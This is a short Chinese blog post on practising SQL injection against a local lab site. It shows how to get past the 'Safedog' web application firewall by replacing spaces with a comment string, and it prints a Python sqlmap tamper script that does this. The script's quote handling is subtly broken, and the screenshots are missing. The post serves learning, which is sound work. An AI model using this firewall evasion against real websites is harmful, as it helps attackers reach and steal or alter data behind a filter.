sqlmap过狗脚本练习1

Posted 2020-12-06 suiyz

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了sqlmap过狗脚本练习1相关的知识，希望对你有一定的参考价值。

本地搭建sql注入网站练习

技术图片 ?

测试安全狗，输入不合法参数被安全狗拦截：

技术图片 ?

使用sqlmap：

技术图片 ?

检测到防护机制，失败；

先手工尝试绕过安全狗：

技术图片 ?

将空格替换为 “/*//*//*/c*/” 成功绕过安全狗；

写个sqlmap脚本：

#demo.py
def tamper(payload,**kwargs):
    retVal = payload
    quote=False
    if payload:
        retVal = ‘‘
        for i in payload:
            if i =="‘" and i==‘"‘:
                quote = not quote
            elif i.isspace() and not quote:
                retVal+=‘/*//*//*/c*/‘
            else:
                retVal+=i
    return retVal

加上脚本继续跑：

技术图片 ?

成功！（之后试了几次就不行了，与安全狗的检测机制有关。。。）